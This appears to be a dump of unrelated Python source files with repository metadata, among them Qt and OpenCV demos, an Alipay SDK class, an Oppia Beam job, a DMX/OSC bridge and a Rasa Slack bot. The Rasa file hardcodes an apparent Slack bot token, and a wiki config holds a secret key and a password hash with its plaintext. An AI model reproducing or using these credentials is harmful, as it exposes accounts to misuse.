f843e8f100b698af74353ec7595c26213574bc15
|
refs/heads/master
| 2023-04-05T10:04:03.726767 | 2021-04-01T16:02:42 | 2021-04-01T16:02:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,032 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: Mu yanru
# Date : 2019.8
# Email : [email protected]
###################################################################
from dayu_widgets_tag import MCheckableTag
from dayu_widgets.qt import QWidget, QHBoxLayout, QApplication, Slot
from dayu_widgets import dayu_theme, MLabel
@dayu_theme.deco
class Checkable(QWidget):
def __init__(self, parent=None):
super(Checkable, self).__init__(parent)
label = MLabel('Categories:')
topic_lay = QHBoxLayout()
topic_lay.addWidget(label)
for i in ['Movies', 'Books', 'Music', 'Sports']:
topic_lay.addWidget(MCheckableTag(text=i))
topic_lay.addStretch()
main_lay = QHBoxLayout()
main_lay.addLayout(topic_lay)
self.setLayout(main_lay)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
test = Checkable()
test.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
d89cfb8f0978fc0bca985f2f530f9406acc32058
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2465/60631/246241.py
|
f35f636406a4f9cd9aa0b1ec54ba471016376403
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 158 |
py
|
si = input()
li = si.split(',')
out = []
for i in range(len(li)):
p = len(li)-1-i
h = li[p]
if i < int(h):
out.append(i+1)
print(max(out))
|
[
"[email protected]"
] | |
9ec8dfb6896bd3defa4e777b809942f49b4b449d
|
3f597d5c1363f1f6f77764bcdb864167c3e51795
|
/qwapp/defaults.py
|
ac08eacd7647f3441469ca0c64e9eeeb3df07f45
|
[] |
no_license
|
mbr/qwapp
|
558c58b47398abcaca41b1814c7b5e8363b8eaf0
|
44fa2ecefcb61d2fb5c2280d30af2b1140f3f03b
|
refs/heads/master
| 2023-06-06T20:48:59.776375 | 2013-06-06T01:46:49 | 2013-06-06T01:46:49 | 1,467,990 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 637 |
py
|
WIKI_NAME = 'qwapp Wiki'
REPOSITORY_PATH = './wiki'
DEBUG = True
SECRET_KEY = 'development key'
# use password.py to generate
PASSWORD_HASH = '06ab2f79d3fb9d86c75f0bb981c95f5d68497b311bdb1ed32918717547b4a6c31017a7a04908c6d39a93c8f748e312d5bfd255cbfbf15530cf374c1861dc73a7' # "devpass"
CACHE_TYPE = 'simple' # set this to 'null' to disable or use memcached, or others
#CACHE_MEMCACHED_SERVERS = ['localhost:11211']
CACHE_THRESHOLD = 200
CACHE_DEFAULT_TIMEOUT = 50 # 50 seconds default cache timeout
CACHE_KEY_PREFIX = PASSWORD_HASH[:10]
# no plugins loaded by default
PLUGINS = ['headershift','wikilinks']
PLUGIN_HEADERSHIFT_LEVEL = 1
|
[
"[email protected]"
] | |
3042812bdbd8a115621ce18b49ec5776b9227138
|
3b9d763180410bf0abf5b9c37391a64319efe839
|
/toontown/town/TTTownLoader.py
|
0780028cd0ae5e5b0b03c022cae3ac05115db2fc
|
[] |
no_license
|
qphoton/Reverse_Engineering_Project_ToonTown
|
442f15d484324be749f6f0e5e4e74fc6436e4e30
|
11468ab449060169191366bc14ff8113ee3beffb
|
refs/heads/master
| 2021-05-08T00:07:09.720166 | 2017-10-21T02:37:22 | 2017-10-21T02:37:22 | 107,617,661 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 869 |
py
|
# File: T (Python 2.4)
import TownLoader
import TTStreet
from toontown.suit import Suit
class TTTownLoader(TownLoader.TownLoader):
def __init__(self, hood, parentFSM, doneEvent):
TownLoader.TownLoader.__init__(self, hood, parentFSM, doneEvent)
self.streetClass = TTStreet.TTStreet
self.musicFile = 'phase_3.5/audio/bgm/TC_SZ.mid'
self.activityMusicFile = 'phase_3.5/audio/bgm/TC_SZ_activity.mid'
self.townStorageDNAFile = 'phase_5/dna/storage_TT_town.dna'
def load(self, zoneId):
TownLoader.TownLoader.load(self, zoneId)
Suit.loadSuits(1)
dnaFile = 'phase_5/dna/toontown_central_' + str(self.canonicalBranchZone) + '.dna'
self.createHood(dnaFile)
def unload(self):
Suit.unloadSuits(1)
TownLoader.TownLoader.unload(self)
|
[
"[email protected]"
] | |
3459de3607f81b8e3cd2943b8031dbd163d4b650
|
1268030197a27bf2ef5e3f5ab8df38993457fed5
|
/run_bot.py
|
552b71c22140a9c5e5e54878a65f05870a32fd77
|
[] |
no_license
|
parimalpate123/rasa_slack_chatbot
|
439abd9a541d6314b46c6fb303c0275803fc9357
|
206aacab62f12be9df9f009f65736caed3e8edac
|
refs/heads/master
| 2020-04-17T14:13:49.917604 | 2019-05-07T11:08:07 | 2019-05-07T11:08:07 | 166,649,129 | 0 | 1 | null | 2019-01-29T11:09:07 | 2019-01-20T10:32:59 |
Python
|
UTF-8
|
Python
| false | false | 1,112 |
py
|
#import json
from rasa_core.channels.slack import SlackInput
from rasa_core.agent import Agent
from rasa_core.interpreter import RegexInterpreter
from rasa_core.channels import HttpInputChannel
#from rasa_core.utils import EndpointConfig
# load your trained agent
#agent = Agent.load(models\current\dialogue, interpreter=RegexInterpreter())
agent = Agent.load('models/current/dialogue', interpreter='models/current/nlu')
#action_endpoint = EndpointConfig(url="http://localhost:5055/webhook")
input_channel = \
SlackInput(slack_token='xoxb-525465834114-525382855891-SYt6HyWl7IfVyhtX19z6jJec'
, slack_channel='@devops') # this is the `bot_user_o_auth_access_token`
# the name of your channel to which the bot posts (optional)
# set serve_forever=True if you want to keep the server running
#agent.handle_channel(HttpInputChannel(5004, "/chat", input_channel))
agent.handle_channel(HttpInputChannel(5004, "", input_channel))
#s = agent.handle_channels([input_channel], 5004, serve_forever=False)
#agent.handle_channels([input_channel], 5004, serve_forever=True)
|
[
"[email protected]"
] | |
14b577ec46ee9d7038f9abbef96019ef6af5fd26
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/RiskFinishLabel.py
|
70510d2ed4724524faa93b6970839d177175fd54
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 1,630 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class RiskFinishLabel(object):
def __init__(self):
self._code = None
self._label = None
self._path = None
@property
def code(self):
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def label(self):
return self._label
@label.setter
def label(self, value):
self._label = value
@property
def path(self):
return self._path
@path.setter
def path(self, value):
self._path = value
def to_alipay_dict(self):
params = dict()
if self.code:
if hasattr(self.code, 'to_alipay_dict'):
params['code'] = self.code.to_alipay_dict()
else:
params['code'] = self.code
if self.label:
if hasattr(self.label, 'to_alipay_dict'):
params['label'] = self.label.to_alipay_dict()
else:
params['label'] = self.label
if self.path:
if hasattr(self.path, 'to_alipay_dict'):
params['path'] = self.path.to_alipay_dict()
else:
params['path'] = self.path
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = RiskFinishLabel()
if 'code' in d:
o.code = d['code']
if 'label' in d:
o.label = d['label']
if 'path' in d:
o.path = d['path']
return o
|
[
"[email protected]"
] | |
0c5e81e31f3423a12125f91838a1aa195b0987ba
|
ca47ebf432f787e0ae78a54afcd3c60d0af2d476
|
/GitProgs/152002016_PythonLabCode1_R_Parnika_Murty/Q2.py
|
1bd4495f446a8e5de2c579c00a17269c90c17d39
|
[] |
no_license
|
Parnika1102/My_Assignments
|
0659c70f8f8473107b49a611ee9d16823331c535
|
b0ecf3df0107c627944f5ef98f72996efdf42f37
|
refs/heads/master
| 2023-03-20T11:37:02.821148 | 2021-03-10T12:14:45 | 2021-03-10T12:14:45 | 344,998,848 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 949 |
py
|
#!/bin/python3
#Class Polygon with attributes numsides and area.
class Polygon:
#__init__() constructor.
def __init__(self,numSides,area):
#The class attributes "numSides" and "area".
self.numSides = numSides
self.area = area
#For the string representation of our object.
def __str__(self):
#To display error message if number of sides is less than 3.
if self.numSides<3 :
raise Exception("Number of sides should be atleast 3")
#To display error message if polygon has negative area.
elif self.area<0 :
raise Exception("Polygon should have postive area")
#To display details about the polygon.
else:
return "Polygon with % s sides and area % s" % (self.numSides, self.area)
try:
#Creating a polygon object with respective number of sides and area.
p1 = Polygon(1,23)
#Printing the object.
print(p1)
#Printing the exception type and respective message.
except Exception as e:
print(type(e))
print(e)
|
[
"email"
] |
email
|
f254f69848a95f326b53f8ce3d6c7f556a3e272f
|
5130754859e274cd06f63260439e5203c2000a11
|
/core/jobs/batch_jobs/blog_post_search_indexing_jobs.py
|
9b9440e7125be3ee12d6e27e9720636aeb7227bd
|
[
"Apache-2.0"
] |
permissive
|
oppia/oppia
|
8ebc9c7c7f2b336e9a79ce04533abe3956f48cbe
|
d16fdf23d790eafd63812bd7239532256e30a21d
|
refs/heads/develop
| 2023-09-04T07:50:13.661276 | 2023-09-03T09:21:32 | 2023-09-03T09:21:32 | 40,687,563 | 6,172 | 4,666 |
Apache-2.0
| 2023-09-14T18:25:11 | 2015-08-14T00:16:14 |
Python
|
UTF-8
|
Python
| false | false | 3,766 |
py
|
# coding: utf-8
#
# Copyright 2022 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Jobs that are run by CRON scheduler."""
from __future__ import annotations
from core.domain import blog_domain
from core.domain import blog_services
from core.domain import search_services
from core.jobs import base_jobs
from core.jobs.io import ndb_io
from core.jobs.transforms import job_result_transforms
from core.jobs.types import job_run_result
from core.platform import models
import apache_beam as beam
import result
from typing import Final, Iterable, List
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import blog_models
from mypy_imports import search_services as platform_search_services
(blog_models,) = models.Registry.import_models([models.Names.BLOG])
platform_search_services = models.Registry.import_search_services()
class IndexBlogPostsInSearchJob(base_jobs.JobBase):
"""Job that indexes the blog posts in Elastic Search."""
MAX_BATCH_SIZE: Final = 1000
def run(self) -> beam.PCollection[job_run_result.JobRunResult]:
"""Returns a PCollection of 'SUCCESS' or 'FAILURE' results from
the Elastic Search.
Returns:
PCollection. A PCollection of 'SUCCESS' or 'FAILURE' results from
the Elastic Search.
"""
return (
self.pipeline
| 'Get all non-deleted models' >> (
ndb_io.GetModels(
blog_models.BlogPostSummaryModel.get_all(
include_deleted=False
)
))
| 'Convert BlogPostSummaryModels to domain objects' >> beam.Map(
blog_services.get_blog_post_summary_from_model)
| 'Split models into batches' >> beam.transforms.util.BatchElements(
max_batch_size=self.MAX_BATCH_SIZE)
| 'Index batches of models' >> beam.ParDo(
IndexBlogPostSummaries())
| 'Count the output' >> (
job_result_transforms.ResultsToJobRunResults())
)
# TODO(#15613): Here we use MyPy ignore because the incomplete typing of
# apache_beam library and absences of stubs in Typeshed, forces MyPy to
# assume that PTransform class is of type Any. Thus to avoid MyPy's error
# (Class cannot subclass 'PTransform' (has type 'Any')), we added an
# ignore here.
class IndexBlogPostSummaries(beam.DoFn): # type: ignore[misc]
"""DoFn to index blog post summaries."""
def process(
self, blog_post_summaries: List[blog_domain.BlogPostSummary]
) -> Iterable[result.Result[None, Exception]]:
"""Index blog post summaries and catch any errors.
Args:
blog_post_summaries: list(BlogPostSummaries). List of Blog Post
Summary domain objects to be indexed.
Yields:
JobRunResult. List containing one element, which is either SUCCESS,
or FAILURE.
"""
try:
search_services.index_blog_post_summaries(
blog_post_summaries)
for _ in blog_post_summaries:
yield result.Ok()
except platform_search_services.SearchException as e:
yield result.Err(e)
|
[
"[email protected]"
] | |
02106294b4d4b980e76f0077bd730aa8cb529c27
|
9c14bb4d3029a9fff23cf0d3e9fdce9ca4e369ab
|
/prettyqt/widgets/composed/imageviewer.py
|
ac1daae24ae902a88755ea0c2d5992f940896d16
|
[
"MIT"
] |
permissive
|
fossabot/PrettyQt
|
0e1ae074ca0776fa02ee0b8e6c04f9d545408855
|
d435b8d8c68d16c704c39972457497c93741859f
|
refs/heads/master
| 2020-05-14T16:50:48.896440 | 2019-04-17T11:48:25 | 2019-04-17T11:48:25 | 181,880,405 | 0 | 0 | null | 2019-04-17T11:48:19 | 2019-04-17T11:48:19 | null |
UTF-8
|
Python
| false | false | 726 |
py
|
# -*- coding: utf-8 -*-
"""
@author: Philipp Temminghoff
"""
import pathlib
import sys
from prettyqt import widgets
class ImageViewer(widgets.Widget):
def __init__(self, title="", parent=None):
super().__init__(parent)
self.title = title
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
path = pathlib.Path("decisiontree.png")
self.image = widgets.Label.image_from_path(path, parent=self)
self.show()
if __name__ == "__main__":
app = widgets.Application(sys.argv)
ex = ImageViewer()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
c7ce6a26eabd9e0321bd10daacd750f082343174
|
b8d2f095a4b7ea567ccc61ee318ba879318eec3d
|
/树 Tree/538. 把二叉搜索树转换为累加树.py
|
9a2100675571f2350424587e70a2d48bbd0aa325
|
[] |
no_license
|
f1amingo/leetcode-python
|
a3ef78727ae696fe2e94896258cfba1b7d58b1e3
|
b365ba85036e51f7a9e018767914ef22314a6780
|
refs/heads/master
| 2021-11-10T16:19:27.603342 | 2021-09-17T03:12:59 | 2021-09-17T03:12:59 | 205,813,698 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 570 |
py
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from util.ZTree import TreeNode
class Solution:
def convertBST(self, root: TreeNode) -> TreeNode:
def dfs(r: TreeNode):
if r:
dfs(r.right)
nonlocal total
total += r.val
r.val = total
dfs(r.left)
total = 0
dfs(root)
return root
|
[
"[email protected]"
] | |
87f27491103c863122d5b540b57be42f6faccd47
|
5b28005b6ee600e6eeca2fc7c57c346e23da285f
|
/nomadic_recording_lib/comm/dmx/OSCtoOLA.py
|
c5c93f2ac60ce93d0dcc09a1ffe7fb3941cf2212
|
[] |
no_license
|
nocarryr/wowza_logparse
|
c31d2db7ad854c6b0d13495a0ede5f406c2fce3f
|
d6daa5bf58bae1db48ac30031a845bf975c7d5cc
|
refs/heads/master
| 2021-01-17T07:19:00.347206 | 2017-06-24T16:57:32 | 2017-06-24T16:57:32 | 25,835,704 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,980 |
py
|
import socket
import threading
import array
#import jsonpickle
from Bases import OSCBaseObject, Serialization
from ola_IO import olaIO
from ..osc.osc_io import oscIO
from ..BaseIO import detect_usable_address
class OSCtoOLAHost(OSCBaseObject):
osc_address = 'OSCtoOLA'
ui_name = 'OLA (Open Lighting Architecture)'
_Properties = {'connected':dict(fget='_connected_getter', fset='_connected_setter')}
def __init__(self, **kwargs):
self.osc_io = kwargs.get('osc_io')
self.root_address = 'OSCtoOLA-' + socket.gethostname()
self.direct_mode = False
# if not self.osc_io:
# self.direct_mode = True
# s = 'OSCtoOLA'
# io_kwargs = dict(confsection=s + '_io', app_address=s, root_address=s)
# for key in ['hostaddr', 'hostport', 'mcastaddr', 'mcastport']:
# if key in kwargs:
# io_kwargs.update({key:kwargs[key]})
# self.osc_io = oscIO(**io_kwargs)
# self.osc_io.add_client_name(socket.gethostname())
self.osc_parent_node = self.osc_io.root_node
super(OSCtoOLAHost, self).__init__(**kwargs)
self.register_signal('state_changed')
self.universes = {}
self.olaIO = olaIO()
#self.osc_io.add_client_name(self.root_address, update_conf=False)
addr = detect_usable_address()
port = self.osc_io.hostdata['recvport']
self.osc_io.add_client(name=self.root_address, address=addr, port=port,
update_conf=False, isLocalhost=False)
self.osc_io.connect('new_master', self.on_osc_new_master)
self.olaIO.connect('new_universe', self.on_new_ola_universe)
self.olaIO.connect('state_changed', self.on_ola_state_changed)
#self.add_osc_handler(callbacks={'request-universes':self.on_universes_requested})
#self.do_connect()
# @property
# def connected(self):
# return self.olaIO.connected
# @connected.setter
# def connected(self, value):
# self.olaIO.connected = value
def _connected_getter(self):
return self.olaIO.connected
def _connected_setter(self, value):
self.olaIO.connected = value
def do_connect(self):
if self.direct_mode:
self.osc_io.do_connect()
self.olaIO.do_connect()
def do_disconnect(self):
def _do_disconnect():
if self.direct_mode:
self.osc_io.do_disconnect()
self.olaIO.do_disconnect()
for univ in self.universes.itervalues():
univ.set_all_zero(True)
t = threading.Timer(.5, _do_disconnect)
t.daemon = True
t.start()
def on_ola_state_changed(self, **kwargs):
self.emit('state_changed', **kwargs)
def on_new_ola_universe(self, **kwargs):
univ = kwargs.get('ola_universe')
if univ.id not in self.universes:
u_kwargs = self.add_osc_child(address=str(univ.id))
u_kwargs.update({'ola_universe':univ, 'root_address':self.root_address})
obj = OSCUniverse(**u_kwargs)
self.universes.update({obj.id:obj})
def on_universes_requested(self, **kwargs):
d = {}
for key, val in self.universes.iteritems():
d.update({key:{}})
for attr in ['id', 'name']:
d[key].update({attr:getattr(val, attr)})
s = Serialization.to_json(d)
self.osc_node.send_message(root_address=self.root_address, address='universes-info', value=s)
def on_osc_new_master(self, **kwargs):
for univ in self.universes.itervalues():
univ.set_all_zero(not self.osc_node.oscMaster)
def on_app_exit(self, *args, **kwargs):
self.LOG.info('oscola app exit')
self.olaIO.on_app_exit()
class OSCUniverse(OSCBaseObject):
def __init__(self, **kwargs):
self._values = None
self.all_zero = False
super(OSCUniverse, self).__init__(**kwargs)
self.register_signal('value_update')
self.values = array.array('B', [0]*513)
#print 'osc path: ', self.osc_node.get_full_path()
self.root_address = kwargs.get('root_address')
self.ola_universe = kwargs.get('ola_universe')
self.ola_universe.Universe = self
#self.id = self.ola_universe.id
self.add_osc_handler(callbacks={'set-channel':self.on_universe_set_channel,
'dump-response':self.on_universe_dump_response})
self.osc_node.send_message(root_address=self.root_address, client=self.root_address, address='request-dump')
#print 'OSCtoOLA new_universe: uid=%s, name=%s, pyid=%s' % (self.id, self.name, id(self))
@property
def id(self):
return self.ola_universe.id
@property
def name(self):
return self.ola_universe.name
@property
def values(self):
if self.all_zero:
return array.array('B', [0]*513)
return self._values
@values.setter
def values(self, values):
self._values = values
def on_universe_set_channel(self, **kwargs):
values = kwargs.get('values')
chan = values[0]
value = values[1]
self.values[chan-1] = value
#print 'oscola univ update: ', chan, value
#print 'update from osc: chan=%s, value=%s' % (chan, value)
if not self.all_zero:
self.emit('value_update', universe=self, values=self.values)
def on_universe_dump_response(self, **kwargs):
values = kwargs.get('values')
for i, value in enumerate(values):
self.values[i] = value
self.emit('value_update', universe=self, values=self.values)
def set_all_zero(self, state):
self.all_zero = state
self.emit('value_update', universe=self, values=self.values)
|
[
"[email protected]"
] | |
7880bcad5a3a3c0cfe1efef41f3c6bcba6189d35
|
49a0010d8c6c3dc4c92a5795ddee418de976ada4
|
/CH03/0311.py
|
e40cc572a518f4ea487a43c2a36bcac7623a0484
|
[] |
no_license
|
mytree/Test_PythonCV
|
4c20ee4f073558488d2bf947fca500f677f36d13
|
9ba1e0bc8e7d84f1f7df3ca051a3d7e70e1745bb
|
refs/heads/master
| 2020-09-13T06:20:04.743092 | 2019-11-19T11:37:40 | 2019-11-19T11:37:40 | 222,679,573 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 865 |
py
|
#0311.py
import cv2
import numpy as np
def onMouse(event, x, y, flags, param):
## global img
if event == cv2.EVENT_LBUTTONDOWN: # 마우스 왼쪽 버튼 클릭
if flags & cv2.EVENT_FLAG_SHIFTKEY: # shift 키와 함께
cv2.rectangle(param[0], (x-5,y-5),(x+5,y+5),(255,0,0))
else:
cv2.circle(param[0], (x,y), 5, (255,0,0), 3)
elif event == cv2.EVENT_RBUTTONDOWN: # 마우스 오른쪽 버튼 클릭
cv2.circle(param[0], (x,y), 5, (0,0,255), 3)
elif event == cv2.EVENT_LBUTTONDBLCLK: # 마우스 왼쪽 버튼 더블클릭
param[0] = np.zeros(param[0].shape, np.uint8) + 255
cv2.imshow("img", param[0])
img = np.zeros((512,512,3),np.uint8)+255
cv2.imshow('img',img)
cv2.setMouseCallback('img', onMouse, [img])
cv2.waitKey()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
90d59540d8e2afccaf99b13f80cc0a735d81e0a3
|
85a7dde9c48945972a7f521f0fbb2eb56b323aa2
|
/obsolete_files/old/listening_eyes.py
|
69a61d1a1a20e04408df1df5513166b7f89f27b3
|
[] |
no_license
|
jwmcgettigan/renegade
|
1e8f61a14d6a5a7aff5c410f0c26bb166f95bd03
|
ef76bebc6867683e1fb3201be547f42aa6e65881
|
refs/heads/master
| 2021-04-06T13:53:12.945602 | 2018-07-17T22:09:13 | 2018-07-17T22:09:13 | 124,680,527 | 1 | 0 | null | 2018-07-17T22:09:14 | 2018-03-10T17:33:52 |
Makefile
|
UTF-8
|
Python
| false | false | 752 |
py
|
#!/usr/bin/env python
import rospy as rp
import cv2
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
bridge = CvBridge()
def left_callback(data):
cv2.imshow("left_eye", bridge.imgmsg_to_cv2(data, desired_encoding="passthrough"))
if cv2.waitKey(20) & 0xFF == ord('q'):
pass
def right_callback(data):
cv2.imshow("right_eye", bridge.imgmsg_to_cv2(data, desired_encoding="passthrough"))
if cv2.waitKey(20) & 0xFF == ord('q'):
pass
def listener():
rp.init_node('listener', anonymous=True)
rp.Subscriber("left_eye", Image, left_callback)
rp.Subscriber("right_eye", Image, right_callback)
rp.spin()
if __name__ == '__main__':
listener()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
1816c72bb11d3ba9ad7302ebd635296b73376925
|
3235145c84c48535bbf27dabfb3faa7359ed6fef
|
/google-cloud-sdk/lib/surface/kms/keyrings/list.py
|
bf8cafeeb0701a5774aa513b68e90225b592a8f0
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
paceuniversity/CS3892017team1
|
b69fb10f5194f09748cd5bca48901e9bd87a55dc
|
f8e82537c84cac148f577794d2299ea671b26bc2
|
refs/heads/master
| 2021-01-17T04:34:04.158071 | 2017-05-09T04:10:22 | 2017-05-09T04:10:22 | 82,976,622 | 2 | 8 | null | 2020-07-25T09:45:47 | 2017-02-23T22:13:04 |
Python
|
UTF-8
|
Python
| false | false | 1,842 |
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""List keyrings within a location."""
from apitools.base.py import list_pager
from googlecloudsdk.api_lib.cloudkms import base as cloudkms_base
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.kms import flags
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
class List(base.ListCommand):
"""List keyrings within a location.
Lists all keyrings within the given location.
## EXAMPLES
The following command lists a maximum of five keyrings in the location
`global`:
$ {command} --location global --limit=5
"""
@staticmethod
def Args(parser):
parser.display_info.AddFormat('table(name)')
def Run(self, args):
client = cloudkms_base.GetClientInstance()
messages = cloudkms_base.GetMessagesModule()
location_ref = resources.REGISTRY.Create(
flags.LOCATION_COLLECTION,
projectsId=properties.VALUES.core.project.GetOrFail)
request = messages.CloudkmsProjectsLocationsKeyRingsListRequest(
parent=location_ref.RelativeName())
return list_pager.YieldFromList(
client.projects_locations_keyRings,
request,
field='keyRings',
limit=args.limit,
batch_size_attribute='pageSize')
|
[
"[email protected]"
] | |
91a697244a8376cdea2aa5aa40233538c0976c78
|
66013dd1c4b051d1934a82f6c903f4088e9db3d0
|
/2주차/2021.01.26/예제/differentiation.py
|
ed0d5c04867a8c4231bd263838638e8709580c8b
|
[] |
no_license
|
dlrgy22/Boostcamp
|
690656d5b0e35d88a9b1480b36b42ffba47b3bc5
|
af6fb8ce02cc92d1d0227a972d187ccc294af0e9
|
refs/heads/main
| 2023-04-18T04:06:18.419625 | 2021-05-07T01:24:47 | 2021-05-07T01:24:47 | 330,589,750 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 260 |
py
|
import sympy as sym
from sympy.abc import x, y
func = sym.diff(sym.poly(x**2 + 2*x + 3), x)
print(func)
print(func.subs(x, 2))
print(sym.diff(sym.poly(x**2 + 2*x*y + 3) + sym.cos(x + 2*y), x))
print(sym.diff(sym.poly(x**2 + 2*x*y + 3) + sym.cos(x + 2*y), y))
|
[
"[email protected]"
] | |
539846eac1b2f133d9cd8effb4190a5c233a6adb
|
1a5d7882b9e89b821851be328256211c65f9c1a2
|
/simple_settings/strategies/__init__.py
|
7d95f88acb1141987187d45f54d012d3e2e30de8
|
[
"MIT"
] |
permissive
|
matthewh/simple-settings
|
2644f3032e5fc7ffa50dc8fa164bf79f640e5641
|
dbddf8d5be7096ee7c4c3cc6d82824befa9b714f
|
refs/heads/master
| 2022-11-04T22:25:55.398073 | 2020-06-22T19:25:03 | 2020-06-22T19:25:03 | 274,223,776 | 0 | 0 |
MIT
| 2020-06-22T19:21:30 | 2020-06-22T19:21:29 | null |
UTF-8
|
Python
| false | false | 805 |
py
|
# -*- coding: utf-8 -*-
from .cfg import SettingsLoadStrategyCfg
from .environ import SettingsLoadStrategyEnviron
from .json_file import SettingsLoadStrategyJson
from .python import SettingsLoadStrategyPython
yaml_strategy = None
try:
from .yaml_file import SettingsLoadStrategyYaml
yaml_strategy = SettingsLoadStrategyYaml
except ImportError: # pragma: no cover
pass
toml_strategy = None
try:
from .toml_file import SettingsLoadStrategyToml
toml_strategy = SettingsLoadStrategyToml
except ImportError: # pragma: no cover
pass
strategies = (
SettingsLoadStrategyPython,
SettingsLoadStrategyCfg,
SettingsLoadStrategyJson,
SettingsLoadStrategyEnviron
)
if yaml_strategy:
strategies += (yaml_strategy,)
if toml_strategy:
strategies += (toml_strategy,)
|
[
"[email protected]"
] | |
ed2954bdd2ec5424da580a3dbdf86056e9c9e612
|
dd1e2ed53fec3dca0fa60042c04ad8cf6019ed89
|
/python/functions/arguments_passed_as_dictionary/arguments_passed_as_dictionary.py
|
bd77e7ed569887e6547b03ab831fdd645d5f53b0
|
[] |
no_license
|
cloudavail/snippets
|
9be4ee285789ff3cff1a3a71e1f505a1b1697500
|
340f5c2735d6ec88b793f1eea91f2b026c24586e
|
refs/heads/main
| 2023-08-03T10:30:13.976947 | 2023-05-15T04:46:32 | 2023-05-15T04:46:32 | 12,838,293 | 22 | 24 | null | 2023-09-07T03:33:17 | 2013-09-15T00:40:49 |
JavaScript
|
UTF-8
|
Python
| false | false | 668 |
py
|
#!/usr/bin/env python
# objective: pass arguments as dictionary
# creates the function "argument_catcher" and accepts the following keywords
def argument_catcher(city, population, size, state):
print 'city: {!s}'.format(city)
print 'state: {!s}'.format(state)
print 'population: {!s}'.format(population)
print 'size: {!s} miles'.format(size)
# creates the dictionary to be passed to the "argument_catcher" function
arguments_dict = {'city': 'San Francisco', 'population': 800000, 'size': 49,
'state': 'California'}
# calls the function "argument_catcher" with the previously created dictionary
argument_catcher(**arguments_dict)
|
[
"[email protected]"
] | |
39c3141c70b4a3fe7f93408a9993d754ec1d4bd5
|
e2c6f262bb4ea12e3adb4534b3d7e3451c416dc4
|
/slarson/pywikipedia/maintcont.py
|
b55f806b04bc8e108737425fb4b8a8401c72cf48
|
[
"MIT",
"Python-2.0",
"LicenseRef-scancode-mit-old-style"
] |
permissive
|
slarson/ncmir-semantic-sandbox
|
c48e8c9dd5a6f5769d4422c80ca58c370786bfab
|
d6a02a5cf4415796f25d191d541ebaccaab53e7f
|
refs/heads/master
| 2016-09-06T04:10:21.136714 | 2009-03-31T09:49:59 | 2009-03-31T09:49:59 | 32,129,001 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,925 |
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
The controller bot for maintainer.py
Exactly one instance should be running of it. To check, use /whois maintcont on irc.freenode.net
This script requires the Python IRC library http://python-irclib.sourceforge.net/
Warning: experimental software, use at your own risk
"""
__version__ = '$Id$'
# Author: Balasyum
# http://hu.wikipedia.org/wiki/User:Balasyum
from ircbot import SingleServerIRCBot
from irclib import nm_to_n
import threading
import time
import math
tasks = 'rciw|censure'
projtasks = {}
mainters = []
activity = {}
class MaintcontBot(SingleServerIRCBot):
def __init__(self, nickname, server, port=6667):
SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
def on_nicknameinuse(self, c, e):
